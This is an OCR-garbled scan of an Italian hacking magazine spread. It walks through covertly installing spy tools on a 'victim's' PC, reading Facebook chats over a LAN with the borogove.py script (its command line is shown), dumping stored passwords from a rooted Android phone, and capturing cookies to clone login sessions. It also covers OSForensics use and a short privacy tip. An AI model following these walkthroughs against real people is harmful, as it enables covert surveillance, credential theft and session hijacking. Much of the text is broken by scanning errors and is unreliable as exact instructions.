HistoryViewer, una volta installato sul PC della vittima, riesce ad estrarre le informazioni di navigazione registrate 
dai browser: indirizzi dei siti Web visitati, cookie e file scaricati. Ecco come possiamo estrarli in pochi istanti. 



▲ Pr epariamo il segugio 

•| i Scompartiamo l'archivio NetworkMiner.zip 
' (presente sul CD-Rom) ed eseguiamo il lile 
"vs etup.exe per installare HistoryV'iewer Se il nostro 
-ente non possiede i privilegi di amministratore sde¬ 
gniamo il file col tasto destro dei mouse dctfcchiam 
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a Niente software aggiuntivi 

2 Rispondiamo Si per consentire a! program 
. ma di apportare modifiche al PC; apparirà il 
wizard d'installazione. Occhiamo Next. accettiamo 
la licenza d uso (/ accept ..), poi scegliamo la voce 
Custom Installatici! e leviamo le spunte por evita 
di installare IncrediBar come provider di ricerca. 


▲ Impostazioni predefinite 

2 Deliriamo la cartella in cui installare il prò 
gamma e consentiamo la creazione dell’ ico¬ 
na del progamma sul Desktop. Giunti alla pagina del 
riepilogo clicchiamo sul pulsante Instali per ultima¬ 
re la procedura guidata. Al termine, clicchiamo su 
Finish per avviare automaticamente il programma 


^ Siamo pronti ad o per are 

Q Ì Al termine dell'installazione il software vie- 
ne eseguito direttamente; in caso non si 
sia scelta tale opzione oppure ogni volta che lo 
si desidera richiamare basterà cliccare due volle 
sull'icona History Viewer de 1 Desktop oppure sele¬ 
zionare la voce di menu Start/Tutti i programmi / 
History Viewer 



^ La schermata principale 

5 ! La finestra di HistoryViewer è divisa in due 

.zone principali Sulla sinistra sono presen 

ti i diversi elementi che possono essere analizzati, 
suddivisi in 4 categorie Ire relative ai browser (IE, 
Firefox e Google Chrome) e una per Windows. Per 
ognuna di esse vengono elencati i dati che pos¬ 
siamo estrarre. 


ino s g uardo alle URL 

0 Per consultare l'elenco dei siti visitati di 
recente clicchiamo su URL history. Appo 
na attivalo questo elemento compariranno, sulla 
destra, la cronologia Web deil’utente. Trascinan¬ 
do la barra che si trova in basso vedremo anche 
il titolo delle singole pagine e l'ultima volta che è 
stata visitata 



^ Cookies e file scaricati 

~J ; Anche i biscotti informatici e i file scaricati 
W sul computer locale possono essere analiz¬ 
zati I Cookies sono disponibili e quindi consultabili 
per tutti e Ire I browser supportati dal programma 


mentre i dati di download sono limitati alle ope 
razioni svolte con Firefox e con Google Chrome. 



Creiamo un report 

g Cor i dati estratti possiamo creare un report 
per consultare con maggiore calma le infor¬ 
mazioni Per generarlo clicchiamo Create Report in 
Report Poi nella finestra di dialogo spuntiamo le voci 
che vogliamo includere, scegliamo il nome e il lun¬ 
go in cui salvarlo e premiamo Start Create Report 



RISULTATO FINALI Ecco H report generato da History 
Viewer: oltre al nome del PC e dell'utente die lo sta 
usando, sono presenti i link per accedere alle varie 
sezioni che si trovano nel documento e scoprire cosi le 
attività svolte su Internet dalla vittima. ► 
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3 Lo sniffing si fa in LAN 

Prima di intercettare il traffico di una rete locale da remoto è consigliabile muovere i primi passi analizzando 
i dati che transitano sul protocollo HTTP locale. Ecco come farlo con HTTPWatch. 



▲ Str umento indispensabile 

•f ] Per installare HTTPWatch sul PC della vitti 
■wJ ma connesso in LAN, eseguiamo il file http- 
watch.exe che troviamo nell arcavo NetworkMi- 
ner zip (presente sui CD-Rom) Se oÉcmLente 
non possiede i privilegi di ammmistr 
mamolo col tasto destro del mouse e i 
Esegui come amministratore 



± Abilitazioni selettive 

2 Se richiesto, cucchiamo Sì per consentire 

. * al programma di apportare modifiche al 

sistema. Accettiamo la licenza d'uso. Nel passag¬ 
gio successivo non abilitiamo il plug-in per Firehox 
(leviamo la spuntai, lasciamo inalterata la cartella 
d'istallazione di default e cucchiamo Instali per 


^ Attiviamo il pluo-in 

2 I Al termine deil'instailazione lasciamo at 
nva l’opzione Display Gettmg Startec e 
dicchiamo Finish Avviamo internet Expiorer -re 
ci chiederà di abilitare il plug-in appena instai 
to. Cliccando Abilita in basso nella finestra com¬ 
parirà una sezione dedicata al analisi del firr 
dati in transito 




^ R egistriamo il flusso dati 

4 Cliccando Record si attiverà la modalità 
•w J di registrazione dei dati. Appena questa 
risulterà attiva diciamo una URL nella barra 
degli indirizzi e accediamo al sito. Al termine del 
caricamento della pagina cucchiamo Stop per 
sospendere la registrazione: per iniziare sono 
sufficienti pochi dati. 


^ U no sguardo d’insieme 

g Nelia parte alta dell'area di lavoro di HTTP- 

. : Watch troviamo, oltre ai pulsanti con cui 

abilitare le diverse lunzioni, anche l'elenco degli 
elementi richiesti al server Cliccando su ognu¬ 
no apparirà la descrizione completa dell’oggetto 
Nella sottosezione Content ne verrà visualizzato 
il contenuto. 


I filtri giusti 

g II traffico catturato, anche se retati wo a 
una sola pagina, è molto consistente pe r 
orientarsi filtriamo i risultati Clicchiamo Filiere. 
nella finestra di dialogo, spuntiamo Enable fitte- 
ring. Contents is e tutti gli elemenli che ci inte 
ressano. Dando OK solo i tipi selezionati saran¬ 
no evidenziati. 


I MESSAGGI DELLA CHAT DI FACEBOOK LI LEGGONO TUTTI 


Anche ì nostri dati di accesso al sodai 
network possono essere in pericolo 
ogni qualvolta ci colleghiamoa Inter¬ 
net. I pirati, infatti, sono in grado di 
leggere anche le nostre conversazioni 
e per farlo devono semplicemente 
usare uno script pronto all'uso e già in¬ 
tegrato nella distnbuzione Back back 
Linux, stancabile gratuitamente da 


www.backtrack-linux.org. Per essere 
usata, inoltre, la distro non necessita 
neanche di installazione: basta infatti 
masterizzare la ISOsu un DVD, avviare 
Il computer da questa unità e lancia¬ 
re il comando startx per ritrovarsi 
davanti alla sua interfaccia grafica. 
A questo punto, il pirata si collega a 
Internet e avvia il browser Firefox dal 


menu Applications/lntemet. Ricerca 
direttamente su Google lo script 6o- 
rogove.py e ne avvia il download, 
salvando il file nella Home de) sistema. 
Al termine, apre il file appena sca¬ 
ricato utilizzando un editor di testo 
(ad esempio, G edit) per scoprirne la 
sintassi d uso. Dovrà infatti indicare 
l'interfaccia utilizzata (Ethernet o Wi- 


Fi), l'indirizzo IP da colpire e il Gateway 
della LAN. A questo punto, non deve 
fa re altro che avviare una nuova ses 
sione del Terminale e far partire lo 
scnpt (ad esempio, python borogov t. 
pyeth0192.168.1.12 192.168.1.1). 
Tutte le eventuali conversazioni su 
Facebook della vittima verranno cosi 
mostrate in chiaro. 
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| L'aspira password 


Investigatore informatico 


DOCUMENTI, FOTO E VIDEO PRIVATI... TUTTI IN CHIARO DA REMOTO 


Tra le informazioni che si possono 
reperire in Rete con un'operazione 
di sniffing da remoto (quindi anche 
dal di fuori di una rete locale LAN), ci 
sono gli indirizzi dei siti Web che la 
vittima ha visitato, le parole chiave che 
transitano dal suocomputer (equindi 
non solo termini di ricerca, ma anche 
password e numeri di carte di credito) 
o il contenuto dei campi compilati nei 
vari form on-line, sino alle immagini 
scaricate da Internet. Questa estra¬ 
zione è possibile poiché la maggior 
parte del protocolli che usiamo per 
la navigazione, primo fra tutti l'HTIP, 
sono in eh iaro e quindi i flussi di dati 


sono facilmente leggibi li. Ovviamente 
questo discorso non vale per i proto- 
colli cifrati, come ad esempio l'SSL, 
che quindi sono molto sicuri (stiamo 
parlando del protocollo HTTPS che è 
quello che si usa, ad esempio, per le 
transazioni commerciali come i pa¬ 
gamenti on-line o per l’accesso ad 
alcune Webmail). 

METTIAMOCI IN ASCOLTO 

Per iniziare a intercettare il traffico 
come un vero hacker servono ben 
pochi strumenti. Per catturare i pac 
chetti di rete a basso livello molti 
dei programmi per lo sniffing su 


Windows utilizzano la libreria open 
source WinRcap (presente sul Web 
DVD, nel file Netv/orkMiner.zip). U na 
volta installata, consente di procedere 
con l'estrazione dei dati grezzi (detti 
RAW) che Uansltanosulla periferica di 
rete selezionata per il controllo. Oltre 
aWinPeap è necessario utilizzare un 
programma di cattura e analisi dei 
dati, come VLADescuo NetwcrkMiner 
(presente sul Web DVD), il cui utilizzo 
è pressoché identico. Una volta che 
VLADescu si è messo in ascolto, tut¬ 
to il traffico generato sulla rete verrà 
analizzato e qualora transitino imma¬ 
gini GIF o JPEG, ma anche video in 



formato MPEG, questi dati verranno 
prontamente registrati sul disco rigi¬ 
do della spia. Il percorso in cui i file 
sono archiviati é mostrato al interno 
della stessa finestra del programma, 
nella colonna Directory: tipicamente 
è C\Users\Nomeiltente\AppData\ 
Loca!\Temp\vlad, accessibile dopo 
aver attivato l'opzione Cartelle file e 
unità nascosti dal menu Strumenti/ 
Opzioni cartella/Visualizzazìone di 
Esplora risorse). Facendo doppio clic 
sul documento preview.htmhi potrà 
richiamare i 1 report creato dallo snif- 
fer. In questo file HTML sono elencati 
e visualizzati tutti i file multimediali 
acquisiti e per ognuno di essi viene 
mostrato l'indirizzo IP del computer 
che ha effettuato la richiesta e il server 
a cu i questo si è connesso! 


• Ecco II risultato di uno sniffing di 
rete eseguito con VLADescu: nel repott 
è possibile leggere le informazioni 
di navigazione dell'utente e anche 
visualizzare un'anteprima delle immagini 
scaricate dal Internet. 



Il browser non lasciairacce 


Per evitare che qualcuno intercetti i dati registrati dal nostro browser è opportuno rimuoverli e attivare una modalità 
di navigazione più rispettosa della privacy. Ecco i passaggi fondamentali per Internet Explorer. 
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^ Le opzioni giuste 

■J | Per eliminare i file registrati sul disco loca 
*—le bisogna accedere al modulo di gestione 
delle opzioni di Internet Explorer. Per richiamar¬ 
lo premiamo Alt+X oppure cucchiamo sullicona 
con l'ingranaggio nella barra degli strumenti e poi 
richiamiamo la voce Opzioni Internet (è la penul¬ 
tima) I moduli che ci interessano si trovano nella 
scheda Generale. 


a. Gestiamo la cronol ogia 

2 Dalla sezione Cronologia esplorazioni. 
—cliccando il bottone Elimina si accede 
alla pagina in cui decidere quali elementi nmuo 
vere dal disco. In funzione delle nostre Esigenze 
di privacy potremmo decidere di spuntare tutte 
le voci o di effettuare cancellazioni selettive. Pre¬ 
mendo inf ine il tasto Elimina tutti i dati verranno 
spazzati via. 


a. Eliminazione automatica 

2 f Nella sezione relativa alla cronologia pos- 
w* siamo eventualmente spuntare Elimina la 
cronologia al momento di uscire per fare in modo 
che Internet Explorer provveda in maniera auto¬ 
noma alla cancellazione delle URL da noi visitate 
nella sessione attuale di navigazione. In alternati¬ 
va, attiviamo la Modalità di navigazione anonima 
(vedi box sottostante). 







































L'aspira password per cellulare 


ira password 
per cellulare 


C’è chi trasforma il proprio 
dispositivo in un passepartout per 
scardinare qualsiasi protezione 


G li smartphone e i tablet, ormai sempre 
più usati, sono a tutti gli effetti piccoli 
computer, e come tali sono esposti a 
tanti rischi in termini di sicurezza, Ci sia 
mo mai chiesti, ad esempio, dove vengono 
memorizzate tutte le password che utiliz¬ 
ziamo per accedere agevolmente a Face- 
book o alla casella di posta elettronica dal 
nostro terminale Android? Effettivamente 
non capita tutti i giorni di badare a questi 
particolari, visto che siamo ancora abituati 
a pensare allo smartphone come a un sem¬ 
plice telefonino. Così non è. Ogni password 
viene infatti memorizzata, il più delle volte 
in chiaro, aH'interno di un database conte 
mito fiai file di sistema di Android. In caso 


Tutto in chiaro 


Ecco come 
il pirata 
scova tutte 
le password 
memorizzate 
nel telefonino 
della sua 
vittima. 
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Tutto ha inizio da un ano 

| 1 Se il pirata entra in possesso di un tela- 
.. J fono "rootato", per iniziare la sua opera 
ha bisogno del (ile manager Root Explorer (può 
acquistarla direttamente da Google Play o cercare 
sulWeb un .apk funzionante). Dopo l'installazione, 
avvia Root Explorer e con un tap su Consenti gii 
assegna i permessi di amministrazione. Si sposta 
dunque nella directory principale ed accede alla 
cartella data. 

















01 Ecco lo sniffa tutto mobile 

Cronologia Web, indirizzi IP visitati, cookie... il pirata usa le app Shark for Root e Shark Reader per accedere 
a informazioni segrete sullo smartphone della vittima. Incredibile ma vero. 
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Un’app per la cattura... 

■j Prima dello smffing dei pacchetti, il pirata 
; installa BusyBox da Google Play. Tappa 
Scarica/Accetta e scarica, riavvia losfroartpho- 
ne e termina l'installazione. Installa < 

Shark forRootó ul telefono della vittimai di 
e con Consenti le assegna i permessi di arimi l 
nistrazione. Preme Start per catturare i pacchetti 
in transito sulla LAN a cui è connesso 



con un’app! 
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Richiesta codice seriale... 

2 ; Si sposta nella directory System e ricer- 
-=~*J ca il file accounts.db, ovvero il databa¬ 
se con i dati memorizzali per il login ai servizi 
on-line configurati sul telefonino. Il pirata lap¬ 
pa quindi sul file per avviarlo, seleziona la voce 
accounts e visualizza tutti gli account memoriz¬ 
zali Alcune password possono essere crittogra- 
fate ma il pirata ha i suoi melodi per decifrare 
ciò che vuole! 


. ..e una per l’analisi 

2 | Al termine della cattura, il pirata ricerca 
.- e installa l’app Shark Reader (fondamen¬ 
tale per la lettura dei pacchetti "sniffati"). Non gii 
resta che installarla. Dopo aver tappato Stop in 
jftòark for Root, il pirata analizza ciò che ha cat- 
tflTjjfcjvemendo Opencapture file(Youcan use 
Shark Reader) la decodifica dei pacchetti dura in 
base alla « 


di smarrimento del telefonino o del tablet, 
ad un malintenzionato bastano realmente 
pochi secondi per impossessarsi di tutti i no¬ 
stri account. F, non solo! Il malintenzionato, 
installando qualche app, è in grado anche di 



Wk 

*sn i fi are” preziose i n fbrmazion i,.eon»p i sit i 
che vistiamo e cookie, usabili pbraccedei e a 1 
servizi Web che utilizziamo. Affinché tutto 
vada per il verso giusto, però, il pirara djfve 
mettere le mani su un terminale dotato ai 


-*• Cooki e d’accesso donati 

3 : Shark Reader decodificai pacchetti catto- 
rati da Shark .for Rool e visualizza l'IP del¬ 
la vittima, la destinazione raggiunta (il sito Web 
contattato dall'utente) e la porta di comunicazio¬ 
ne Con un tap sul nome del pacchetto visualizza 
informazioni come il browser usato e cookie scam - 
biati. Con questi ultimi può clonare sessioni di login 
ai servizi usati dalla vittima. 


diritti di amministrazione, ovvero, in gergo 
tecnico, “contato”. Prestiamo dunque mas¬ 
tra attenzione a dove lasciamo il nostro 
ausissimo telefonino: potremmo avert¬ 
er prese. 



ANALISI COMPLETA SUL COMPUTER 


L'analisi dei pacchetti sniffati può 
avvenire anche direttamente 
dallo smartphone Android. Ma 
se il pirata vuole avviare un pro¬ 
cesso di decodifica più accurato 
può trasferire il file peap, conte¬ 
nente tutti I pacchetti catturati 
da Shark for Root (e salvato nella 
home directory del terminale 
Androidi, sul proprio PC. Utiliz¬ 
zando poi il software Xplico (pre¬ 
sente nella distribuzione Linux 
BackTrack 5 R2) e con un po' di 
fortuna può scoprire qualche 
password digitata dalle vittime 
connesse alla reteWi-Fi. Perfarfo, 
il pirata si procura una copia di 
BackTratk 5 R2e d avvia da Ap 
plications/BackTrack/infarma- 
tion GatheringJNetwork Analy- 
sis/Network Traffic Analysis il 
software Xptieo web giti Avvia 
quindi una nuova sessione del 


Terminale e digita il comando/ 
etc/in it. d/xplico start 
Digita localhost.-9876 nella barra 
degli indirizzi del browser per 
visualizzare l'interfaccia di Xplico. 
Inserisce ai campi usemame e 
password il testo xptieo e confer¬ 
ma con un die su Login Preme 
New Case e da Data Acqubtlon 
sceglie l Iploading PCAP captare 
fife/s Conferma con Create 
Non gli resta che cliccare su New 


Session, inserire un nome identi¬ 
ficativo e confermare con Create. 
Apre quindi la sessione appena 
creata, raggiunge la voce Pcap 
sete preme Browse per caricare 
il file jpeap trasferito dal telefoni¬ 
no al PC. Dopo aver confermato 
con Upload: Xplico si mette al 
lavoro decodificando tutti I dati 
catturati e fornendo in output 
tutto ciò che è riuscito a scovare. 
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computer 

poliziotto 

Installa subito il software usato 
dalla Polizia Scientifica e diventa 
un abile investigatore informatico 


Cosaci O 
occorre 

TOOL DI ANALISI 
FORENSE 

OS FORENSICS 

Lo troni su VCD 

Sto Hitumet: 

www.ostorensics.eom 


-or: 
Sllki’AUTjR^ 

Vistaiacr '# ìHi - 
eb<tegc$«& ^ — 
deHargomento tsttótr 
nell'articolo, afitaano 
liccsu di ctiieaora un 
prezioso contriouto 
a uno dei massimi 
esporti del settore. 

Riccardo Merlalo 

divulgatore tecnolngico 
ette ha realizzato 
centinaia ci guide, 
tutorìai e articoli per 
numerose nwste e 
(xibbtezioal Manche, 
u l'autore del libro 
“Linvestigatore 
Hiformatico" edito 
daApogeoi '.w 
wSirnggaflh&ft/j 
). 


L e parole “Computer Forensics” spa¬ 
ventano un sacco di persone, più che 
altro perché il loro significato non è cosi 
immediato. Diciamo che hanno a che fare 
con le investigazioni informatiche, quelle 
che si svolgono su ormai buona pane delle 
scene del crimine. Di qualsiasi crimine. 
Partendo da brutte storie di spionaggio, per 
arrivare ad ancor più spiacevoli omicidi, 
spesso la risoluzione del caso passa per 
l'analisi di computer, smartphone, tablet e 
altri apparecchi digitali che fanno parte del 
nostro vivere quotidiano, alla pari delle più 
classiche “armi del delitto” Nella memoria 
di un computer, per esempio, si può celare la 
Ctunolùgia di una chat nella quale La vittima 
di un omicidio siè confidata coni! suo assas¬ 
sino. Per non parlare della posta elettronica 
con la qualeha stabilito, magari, luogo e ora 
del primo, e fatale, appuntamento. Come 
accen nato, la computer forensics riveste un 
ruolo di grande importanza anche nei casi 
di spionaggio industriale. Un dipendente 
invia tramite posta elettronica un allegato 
con un progetto da milioni di euro, per poi 
cancellarlo, sicuro di non essere becca 
to. Così sta all'investigatore setacciare il 
sistema nel tentativo di riportare in vita 
l’e-mail e dimostrare la colpevolezza del 
sospettato. 


Questione di conoscenze... 

Al sol Ito, tra il dire e il fare c'è di mezzo un 
mare di tecnica e conoscenze che richie 
dono una grande preparazione prima di 
potersi definire esperti di computer foren¬ 
sics. Questa discipli na, infat ti, necessita d i 
competenze che riguardano un po' tutti gli 
aspetti di un sistema informatico. Si par 
te dalle reti, anche quelle più complesse 
(necessarie per le strutture industriali], 
per arrivare al funzionamento a basso 
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□ Prepariamo il segugio 

L'installazione di OSForensics non richiede particolari accortezze: bastano solo pochi clic del mouse e al termine 
saremo pronti per iniziare le indagini forensi sul nostro computer! 
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^ Tutto a portata di m 

■| \ Scompartiamo l’archivio compre; 

- OSForensics zip che troviamo sul CD-' 
Hom e tacciamo doppio clic sul file eseguibile 
osf.exe contenuto al suo interno per avviare 
la procedura guidata di installazione di OSFo¬ 
rensics. 




L’installazione è cosa fatta 

Clicchiamo Atarfnella prima schermala 
wizard, spuntiamo l accept thè agre- 
r per ^carpare i termini d'uso del softwa¬ 
re e pr.rmliamn con ttàxt. Fremiamo Next nelle 
schermate succdkiv 
zioni predefimte e pSTHi^hJ 


^Mattare le imposta- 


± Gli ulti mi ritocchi 

2 j Dopo qualche secondo, apparirà la scher- 
w mata Information olir,chiamo Next per 
proseguire. Lasciamo il segno di spunta su Lau- 
nch OSForensics nella finestra successiva e pre¬ 
miamo su Finish per completare la procedura 
d’installazione e avviare il programma. 


livello di ogni periferica, passando per 
struttura e gestione interna della memo¬ 
ria, protocolli di trasmissione dati e tanto, 
tantissimo altro ancora. Ovviamente non 
si può prescindere anche da noiose ma 
fondamentali competenze legali. Eh sì, 
perché le indagini, per avere valenza in se¬ 
de processuale, vanno certificate secondo 
rigidi parametri, per evitare inquinamenti 
pronti a mandare in fumo investigazioni 
lunghe mesi e mesi. È pur vero, tuttavia, 
che chi vuole divertirsi con la computer 
forensics può farlo in privato, ignorando 
un sacco di queste antipatiche nozioni, e 
ricavandone pure degli strumenti utili per 
risolvere piccoli misteri quotidiani. Per 
esempio, per recuperare file cancellati 
erroneamente, ripristinare e-mail elimi¬ 
nate o spostate in zone nascoste del disco 
rigido, analizzare attività sospette da parte 
di colleglli invidiosi nel nostro computer, e 
via dicendo. Il tutto, se eseguito nel nostro 
computer, è legale e divertente, ma va da 
sé che, se applicato su un sistema altrui, 
si tramuta in vero e proprio spionaggio 
di alto livello. Un'attività di sicuro emo¬ 
zionante, ma anche illegale: si tratta di 
scegliere se andare dalla parte dei buoni 
o dei cattivi. 


ientrC| 3 l 

tanno la po&j» 


... ma anche di stnimf 

Posto, dunque, che tutti hanno la po&% 
bilità di accedere al mondo delle investi¬ 
gazioni informatiche, andiamo a parla¬ 
re di mezzi, ossia quegli strumenti che 
consentono di svolgerle. I professionisti, 
ovviamente, dispongono di un arsenale di 
programmi e apparecchi costosi, pronti ad 
accompagnarli dai primi rilievi fino alle 
analisi finali. I,a classica indagine, sem 
plificando, inizia infatti con uno studio 
della scena del crimine e questo viene 
fatto non solo dall'investigatore informa¬ 
tico ma anche dai colleghi della polizia 
scientifica. Insomma, si deve stabilire che 
toccando l’oggetto hi-tech di turno non 
ci sia il rischio di compromettere altre 
prove, e dunque si usano lampade U.V. 
e tutte quegli apparecchi resi famosi da 
serie come C.S.I.. A questo punto si pas¬ 
sa alla vera computer forensics, di solito 
con un processo chiamato “clonazione". 
Analizzare direttamente la memoria del 
computer incriminato, infatti, è pericolo¬ 
so: qualsiasi utilizzo porta alla modifica di 
qualche dato. Così si procede con la copia 
del disco, per creare un clone da analizza¬ 
re poi con calma, nel proprio laboratorio. 
Esistono diversi kit utili allo scopo. Alcuni 


sono sotto forma di valigette con cavette- 
rl ah ssor ti la e una piccola scheda madre 
con tutto il necessario per effettuare il 
trasferimento, in modo veloce e preciso. 
Altri consistono, piti semplicemente, in un 
notebook con parecchia memoria libera. 

Il concetto di base, comunque, non 6 di 
verso dal fare una copia “byte per byte”, 
la più affidabile, del disco rigido. Per que¬ 
sto motivo, l'importante è scollegare il 
disco originario, collegarlo alla propria 
strumentazione, qualunque essa sia, ed 
effettuare la copia in modalità lettura. Si 
deve infatti disabilitare qualunque tipo di 
scrittura verso la memoria prelevata dalla 
scena del crimine, per evitare di sovra- 
scrivere e cancellare per sempre dati che 
potrebbero tornare utili alle indagini. 

Investigazioni per tutti 

Una volta che il disco è nelle mani dell’in¬ 
vestigatore, si procede con la sua analisi. 
Questa viene effettuata con una molte 
piicità di metodi diversi. C’è chi apprezza 
il “fai da te", quindi si adopera con sof¬ 
tware in grado di analizzare ogni singoli 
indirizzo di memoria, e chi invece vuole 
semplificarsi la vita, sfruttando program 
mi automatici e dannatamente costosi ► 
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UTILI ALLEGATI 

Cosi tome avviene 
nella realtà, anche al 
nostro faldone digitale 
delle indagini possiamo 
allegare immagini o do¬ 
cumenti che. Infittivo, 
ci potrebbero aiutare 
a ricostruire il "caso”. 
Dall'interfaccia princi¬ 
pale di OSforensics cuc¬ 
chiamo su Munage cute, 
selezioniamo l'indagine 
che d interessa (archi 
viata nel Macropasso B) 
e premiamo il pulsante 
AddAttadiimnt. Nella 
schermata che appare 
selezioniamo il file da 
allegare, dicdiiamo 
Apri e poi Add. Per vi- 
sualizzarlo, successiva¬ 
mente, basterà «viden- 
ziado nella sezione («se 
Itemi e dittare su Open. 


CHAT sono 
CONTROLLO 

Una delle attività più 
comuni al computer è 
sicuramente la chat, 
usata da tutti per co¬ 
municare velocemente 
coni propri amici. Nella 
cronologia dei program 
mi di chat, quindi, e 
possibile trovare ogni 
tipo di informazione, 
anche quelle più com¬ 
promettenti. Persino II 
sicuro Stirpe non scappa 
a questa regola. Se 
l'utente non si ricorda 
di cancellare periodi¬ 
camente la cronologia 
(da Strumenti/Opnonif 
Privacy, dittando 
Cancella la cronologia ). 
basta un tool gratuito 
come SlcypelogView 
(vrww.winm agazi ne. 
it/link/'1087),chenon 
deve essere neanche 
installato, per leggere 
tutti i vecchi messaggi 
scambiativi» chat. 


3 Si parte con le indagini 

Un investigatore che si rispetti sa sempre come analizzare un sistema nel minimo dettaglio. 
Ecco come scoprire i segreti che il proprietario di un PC vuol nascondere a occhi indiscreti! 



^ Iniziamo ranalisi 

| LafffrrAp&azione da compiere è quella d aprire un 
ncartaiiirf^rei te urtami, usando il gergo dei vecchi 
investigatori. Noi parliamo di informatica e così apriremo una 
cartella, nella quale andrena ad archiviare tutti. risultati delle 
nostre analisi. In Start cucchiamo Create Case • 


^ I dettagli del caso 

2 l Come tutte le cartelline documentali che si rispettino 
wi anche per quella digitale servono alcune informazioni 
per archiviarla correttamente. In Case rame diamo un nome al 
caso, indichiamo anche quello dell'Investigatore, lasciamo irrva 
nate Timezone De fault Drive e Case tolder e diamo OK. 
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* Il faldone delle indagini 

3 Per accedere (anche in seguito) alla cartella contenen- 
te tutti i resoconti delle nostre indagini, dalllnterfac- 
cia principale di OSForensics accediamo alla sezione; Manage 
Case. Per aggiungere ultenori dettagli sul caso, selezioniamo 
la cartella e cucchiamo sul pulsante Edit Case Details. 


^ Il punto della situazione 

4 Per stampare un resoconto delle indagini, selezioniamo 
il caso che ci interessa e cucchiamo Generate Hepon. 
In Export fleport lasciamo invariati i menu Case Reporte Sty- 
le e cucchiamo OK. Nel percorso indicato in Output Location 
troveremo il report del caso in formato HTML, 


(come EnCase, che è lo standard del set 
tore, «rww.guidancesoftware.com). E poi 
c’è chi è furbo o usa OSForensics. 

Lo strumento adatto a tutti 

Si tratta di uno dei software più nuovi nel 
campo della computer forensics, tanto 


che il suo slogan è "Digital investigation 
for a new era” (investigazione digitale per 
una nuova era). Un programma potente e 
veloce, abbastanza semplice da utilizzare, 
che include tutti gli strumenti essenziali 
e professionali per svolgere un’indagine 
forense accurata oppure un controllo ve 


loce e divertente nel nostro sistema. Tanta 
bontà si paga cara, circa 400 dollari, ma 
al momento è disponibile una versione 
"beta” completa e gratuita, pronta a tra 
sformarci in espei ti di computer forensics. 
Fn queste pagine, i trucchi per utilizzarla 
al meglio. 
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a Prepariamo l’hard disk 

Per ottimizzare le ricerche di file nascosti nei meandri dell’hard disk, è opportuno effettuare un’indicizzazione di 
tutto il contenuto. In questo modo, troveremo le tracce del “crimine" molto più velocemente! 





▲ i Un indice pe r l’hard disk 

■| I Dall'interfaccia principale di otfmPs 
v —i selezioniamo Create Index e dicchi^ 
Create Index. Nella schermata che appare, soeglia 
~x> i contenuti da indicizzare (ad esempio Emails, 
ma possiamo anche selezionare tutte le voci propo¬ 
ste come foto, PDF ZIP ) e premiamo A lext. 


Scansioni approfondite 

Nella schermata successiva lasciamo attiva 
la voce Whole Drive per indicizzare tutto il 
deH'hard disk Clicchiamo su Advanced 
piamo personalizzare la procedura di 
indicizzazione*del disco. Procediamo con Nexte in 
index Titte pod ice. 



^ Ora è tutto a portata di clic 

3 1 Clicchiamo Start Indexing per avviare l’in- 

.dicizzazione del disco: la procedura durerà 

diversi minuti a seconda delle dimensioni deli farci 
disk. Una barra di avanzamento ci aggiornerà su 
quanto tempo manca e quante e-mail sono state 
indicizzate, gli errori e il tempo trascorso 



via con i recu aeri estremi 


Ora che il disco è stato indicizzato, possiamo andare alla ricerca di tutte le e-mail archiviate. E non solo quelle 
elencate nel Client di posta elettronica, ma anche quelle già cancellate! Ecco come procedere. 
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Parole compromettenti 

■| | Spostiamoci in Search Index : in Enter 
Search Woralsscriviamo una Daria chia¬ 
ve che potrebbe essere contenuta nelle e-mail 
incriminate e in Index to search indichiamo 
dove cercarla Clicchiamo sul pulsante Search 
per avviare l'operazione. 


a Ecco tutte le tracce 

2 Teimii lata la ricerca, i risicali verranno eleo 

. ;i cali nella schermata Search Index, orinati 

per tipologia. Nel nostro caso, spostiamocrnsl tab 
Email. Avremo un'anteprima di quelle contenenti la 
parola chiave. Per leggerle, selezioniamole col tasto 
destro del mouse e clicchiamo Open 


± Tì ho scoperto! 

3 ! Se non troviamo indizi, spostiamoci nel tab 
Unallocated Qui vengono elencati queeji 
elementi che in una ricerca normale non com¬ 
parirebbero, perché cancellati o non più leggibt 
li. Anche in questo caso, selezioniamoli col tasto 
deslro del mouse e clicchiamo Open per leggerli. 
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a Analisi dettagliata dei log 

Una ricerca di infomiatica forense permette di scoprire lo stile d’uso del PC: quanti accessi sono stati effettuati, 
il browser usato e i siti piu visitati, se sono stati usati supporti esterni... Ecco in che modo. 





i ESSE®»" 

■a.W.MLX. 


^ Analisi di un comportamento 

■| lj Spostiamoci nella sezione fmaùtActivF 
ty, impostiamo dei parametrWl flce'ca, sia 
temporali sia per i dischi su cui cercare, e clicchia- 
mo Scan. Lasciando All nel menu Show only ver 
tanno elencate tutte le attività recenti : accessi a siti 
Web chiavette inserite e ogni azione effettuata. 


^ Na vigazione s otto controllo 

2 f Se nel menu a tendina Show only sele- 
- r ziomamo la voce Browser History. ecco le 
gru compiute sul Web. Nello stesso modo possia- 
ere i download effettuati e i log delle chal, 
le jflfifle sgjpjff d una chiavetta Usb. È davvero un 
potente ifte/TO di ricami, questo programma! 


^ I log di tut to! 

2 ì Possiamo anche avere una panoramica 
generale di quelle che sono state le opera¬ 
zioni compiute nel periodo preso in esame, con i log 
delle operazioni. Nel menu Show Only selezioniamo 
Events. Gli eventi sono, appunto, le azioni in generale 
e il nsultato è a dir poco sorprendente. 



ECCO ANCHE 
LE PASSWORD 

fon OS Forensi» è pos¬ 
sibile recuperare ambe 
tutte le password celate 
nel sistema. Abbiamo 
il menu Passwords 
che fa proprio al aso 
nostro. Ci sono diverse 
schede in questo menu. 
La prima ci permette 
di fare una ricerca 
generica, nicchiamo 
su Kttriere Paisword. 
Aspettiamo un attimo 
che il programma effet 
tuila ricerca per avere 
i risultati nella parte 
centrale della scheda. 
Da non credere! In pochi 
secondi ecco a nostra 
disposizione i siti visi¬ 
tati, lo usernameela 
password utilizzati per 
accedervi, addirittura II 
browser utilizzato per 
l'accesso, l'eventuale 
posizionamento in 
blacklist, l'utente che 
ha effettuato l'accesso e 
anche il percorso! 



File cancellati? Rieccoli! 

È difficile che qualcuno lasci sul PC documenti “piccanti^ in genere, dopo averli letti e 
visualizzati, li cancella. Se non fosse che con OSForensics bastano pochi clic per recuperarli. 


Z — 




^ Un segugio nel PC 

■| | Dal menu principale di OSForensics, spostiamoci in 
Deleted Fites Search Come prima cosa, cucchiamo 
sul pulsante Contig e nella finestra che appare, impostiamo 
il menu Ouality su Excellent or Good. per ottenere i risultati 
migliori nella ricerca di file cancellati. 


^ A m e non sfugge nulla! 

2 I (ficchiamo Search. Dopo pochi secondi ecco I elenco 
- di tutti i file cancellati Per ognuno, è indicato un nume¬ 
